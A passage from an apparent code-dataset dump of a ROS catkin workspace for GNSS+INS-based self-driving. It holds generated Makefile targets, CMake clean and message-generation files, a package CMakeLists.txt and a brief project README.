target.\nactionlib_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/build\n.PHONY : actionlib_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages_py.dir/rule\n\n# Convenience name for target.\npath_generate_messages_py: path/CMakeFiles/path_generate_messages_py.dir/rule\n\n.PHONY : path_generate_messages_py\n\n# fast build rule for target.\npath_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages_py.dir/build.make path/CMakeFiles/path_generate_messages_py.dir/build\n.PHONY : path_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_eus: path/CMakeFiles/roscpp_generate_messages_eus.dir/rule\n\n.PHONY : roscpp_generate_messages_eus\n\n# fast build rule for target.\nroscpp_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_eus.dir/build.make path/CMakeFiles/roscpp_generate_messages_eus.dir/build\n.PHONY : roscpp_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_py: path/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_py\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build.make path/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build\n.PHONY : rosgraph_msgs_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_lisp: path/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_lisp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build.make path/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f 
CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_nodejs: path/CMakeFiles/roscpp_generate_messages_nodejs.dir/rule\n\n.PHONY : roscpp_generate_messages_nodejs\n\n# fast build rule for target.\nroscpp_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_nodejs.dir/build.make path/CMakeFiles/roscpp_generate_messages_nodejs.dir/build\n.PHONY : roscpp_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_lisp: path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n\n.PHONY : roscpp_generate_messages_lisp\n\n# fast build rule for target.\nroscpp_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_lisp.dir/build.make path/CMakeFiles/roscpp_generate_messages_lisp.dir/build\n.PHONY : roscpp_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_geneus.dir/rule\n.PHONY : path/CMakeFiles/path_geneus.dir/rule\n\n# Convenience name for target.\npath_geneus: path/CMakeFiles/path_geneus.dir/rule\n\n.PHONY : path_geneus\n\n# fast build rule for target.\npath_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_geneus.dir/build.make path/CMakeFiles/path_geneus.dir/build\n.PHONY : path_geneus/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_nodejs: path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build\n.PHONY : rosgraph_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_cpp: path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : nav_msgs_generate_messages_cpp\n\n# fast build rule for target.\nnav_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/build\n.PHONY : 
nav_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_cpp: path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_cpp\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/build\n.PHONY : actionlib_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_eus: path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n\n.PHONY : nav_msgs_generate_messages_eus\n\n# fast build rule for target.\nnav_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_eus.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_eus.dir/build\n.PHONY : nav_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_lisp: path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : nav_msgs_generate_messages_lisp\n\n# fast build rule for target.\nnav_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/build\n.PHONY : nav_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages.dir/rule\n\n# Convenience name for target.\npath_generate_messages: path/CMakeFiles/path_generate_messages.dir/rule\n\n.PHONY : path_generate_messages\n\n# fast build rule for target.\npath_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages.dir/build.make path/CMakeFiles/path_generate_messages.dir/build\n.PHONY : path_generate_messages/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_nodejs: path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : 
nav_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nnav_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/build\n.PHONY : nav_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_cpp: path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n\n.PHONY : roscpp_generate_messages_cpp\n\n# fast build rule for target.\nroscpp_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_cpp.dir/build.make path/CMakeFiles/roscpp_generate_messages_cpp.dir/build\n.PHONY : roscpp_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_py: path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_py\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/build\n.PHONY : actionlib_msgs_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_py: path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n\n.PHONY : nav_msgs_generate_messages_py\n\n# fast build rule for target.\nnav_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_py.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_py.dir/build\n.PHONY : nav_msgs_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_lisp: path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_lisp\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/build\n.PHONY : actionlib_msgs_generate_messages_lisp/fast\n\n# Convenience name for 
target.\npath/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_nodejs: path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/build\n.PHONY : actionlib_msgs_generate_messages_nodejs/fast\n\nsrc/gps_planner.o: src/gps_planner.cpp.o\n\n.PHONY : src/gps_planner.o\n\n# target to build an object file\nsrc/gps_planner.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.o\n.PHONY : src/gps_planner.cpp.o\n\nsrc/gps_planner.i: src/gps_planner.cpp.i\n\n.PHONY : src/gps_planner.i\n\n# target to preprocess a source file\nsrc/gps_planner.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.i\n.PHONY : src/gps_planner.cpp.i\n\nsrc/gps_planner.s: src/gps_planner.cpp.s\n\n.PHONY : src/gps_planner.s\n\n# target to generate assembly for a file\nsrc/gps_planner.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.s\n.PHONY : src/gps_planner.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... edit_cache\"\n\t@echo \"... test\"\n\t@echo \"... install/strip\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... gps_planner\"\n\t@echo \"... path_genpy\"\n\t@echo \"... path_generate_messages_nodejs\"\n\t@echo \"... path_genlisp\"\n\t@echo \"... path_generate_messages_lisp\"\n\t@echo \"... path_generate_messages_eus\"\n\t@echo \"... path_gencpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... path_generate_messages_cpp\"\n\t@echo \"... path_gennodejs\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... actionlib_msgs_generate_messages_eus\"\n\t@echo \"... path_generate_messages_py\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... roscpp_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... path_geneus\"\n\t@echo \"... rosgraph_msgs_generate_messages_nodejs\"\n\t@echo \"... nav_msgs_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_cpp\"\n\t@echo \"... nav_msgs_generate_messages_eus\"\n\t@echo \"... install\"\n\t@echo \"... nav_msgs_generate_messages_lisp\"\n\t@echo \"... path_generate_messages\"\n\t@echo \"... nav_msgs_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_py\"\n\t@echo \"... install/local\"\n\t@echo \"... 
nav_msgs_generate_messages_py\"\n\t@echo \"... actionlib_msgs_generate_messages_lisp\"\n\t@echo \"... actionlib_msgs_generate_messages_nodejs\"\n\t@echo \"... src/gps_planner.o\"\n\t@echo \"... src/gps_planner.i\"\n\t@echo \"... src/gps_planner.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7633410692214966,
"alphanum_fraction": 0.7911832928657532,
"avg_line_length": 42.099998474121094,
"blob_id": "e05181532a938eaaa407193657a87dbbdbc22937",
"content_id": "e0636ff26307ef38c8565ab3ea0eb39b5af6ac3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_nodejs\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs/msg/pos320.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs/msg/pose2dArray.js\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_nodejs.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
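The clean rules above list the gennodejs output for zf_msgs, implying the package defines pos320 and pose2dArray messages; the genpy pipeline would emit matching Python classes with the same stems. A subscriber sketch under those assumptions — the class name is inferred from the generated file stem, and the topic name is invented:

# Sketch only: the cmake_clean file above implies zf_msgs/msg/pos320.msg
# exists, so genpy would expose a class named pos320. Topic name is invented.
import rospy
from zf_msgs.msg import pos320


def on_fix(msg):
    rospy.loginfo('pos320 fix: %s', msg)


rospy.init_node('pos320_echo')
rospy.Subscriber('pos320_data', pos320, on_fix)
rospy.spin()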
{
"alpha_fraction": 0.5832037329673767,
"alphanum_fraction": 0.5902021527290344,
"avg_line_length": 27.577777862548828,
"blob_id": "e0a89e63b738fc568b2e4b8cdce65f7362837af8",
"content_id": "20451a0d852955306da227e2071f9b8dff0ecb67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1286,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 45,
"path": "/src/pos320/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(pos320)\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS \n roscpp\n rospy\n std_msgs\n nav_msgs\n geometry_msgs\n genmsg\n zf_msgs\n)\n\nFIND_PACKAGE(Boost COMPONENTS system thread REQUIRED)\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(driver src/driver.cpp)\nadd_executable(simulator src/simulator.cpp)\ntarget_link_libraries(driver \n ${catkin_LIBRARIES}\n ${Boost_SYSTEM_LIBRARY}\n ${Boost_THREAD_LIBRARY}\n )\ntarget_link_libraries(simulator\n ${catkin_LIBRARIES}\n ${Boost_SYSTEM_LIBRARY}\n ${Boost_THREAD_LIBRARY}\n )\nadd_dependencies(simulator driver pos320_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
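pos320's CMakeLists.txt above links the driver and simulator against Boost system/thread because, per the project README in the next record, the driver reads the GNSS+INS receiver over a serial port via boost::asio. For illustration only, here is the same read loop expressed in Python with pyserial; the port, baud rate, and newline-delimited framing are assumptions, not values from the repo.

# Illustrative Python counterpart of the C++ boost::asio serial read loop.
# Port, baud rate, and line-oriented framing are assumed, not from the repo.
import serial  # pyserial


def read_frames(port='/dev/ttyUSB0', baud=115200):
    with serial.Serial(port, baudrate=baud, timeout=1.0) as ser:
        while True:
            line = ser.readline()  # blocks for at most `timeout` seconds
            if line:
                yield line.strip()


if __name__ == '__main__':
    for frame in read_frames():
        print(frame)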
{
"alpha_fraction": 0.7453703880310059,
"alphanum_fraction": 0.7731481194496155,
"avg_line_length": 26,
"blob_id": "c02387dc030c5ecc2d597d90e7f46983b06399a2",
"content_id": "c089755ec7ba17c078c4caa900622af9d654987c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 8,
"path": "/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "## Self-driving for only GNSS+INS navigation\n\n# GNSS+INS,WuHan MAP Time Space,pos320\n src/pos320/ includes driver, reading serial port using boost::asio\n\n# pure pursuit algorithm for path following\n\n# path planning\n"
},
{
"alpha_fraction": 0.768539309501648,
"alphanum_fraction": 0.7688603401184082,
"avg_line_length": 29.09661865234375,
"blob_id": "3ad897dffba01e28d716e866a45acc1a9a913e6e",
"content_id": "9ebbee0991591aa434c83a026ff4b266df9761af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 6230,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 207,
"path": "/build/path/cmake/path-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(WARNING \"Invoking generate_messages() without having added any message or service file before.\nYou should either add add_message_files() and/or add_service_files() calls or remove the invocation of generate_messages().\")\nmessage(STATUS \"path: 0 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(path_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(path\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(path_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(path_generate_messages path_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_gencpp)\nadd_dependencies(path_gencpp path_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(path\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(path_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(path_generate_messages path_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_geneus)\nadd_dependencies(path_geneus path_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(path\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(path_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(path_generate_messages path_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_genlisp)\nadd_dependencies(path_genlisp path_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(path\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(path_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(path_generate_messages path_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_gennodejs)\nadd_dependencies(path_gennodejs 
path_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(path\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(path_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(path_generate_messages path_generate_messages_py)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_genpy)\nadd_dependencies(path_genpy path_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS 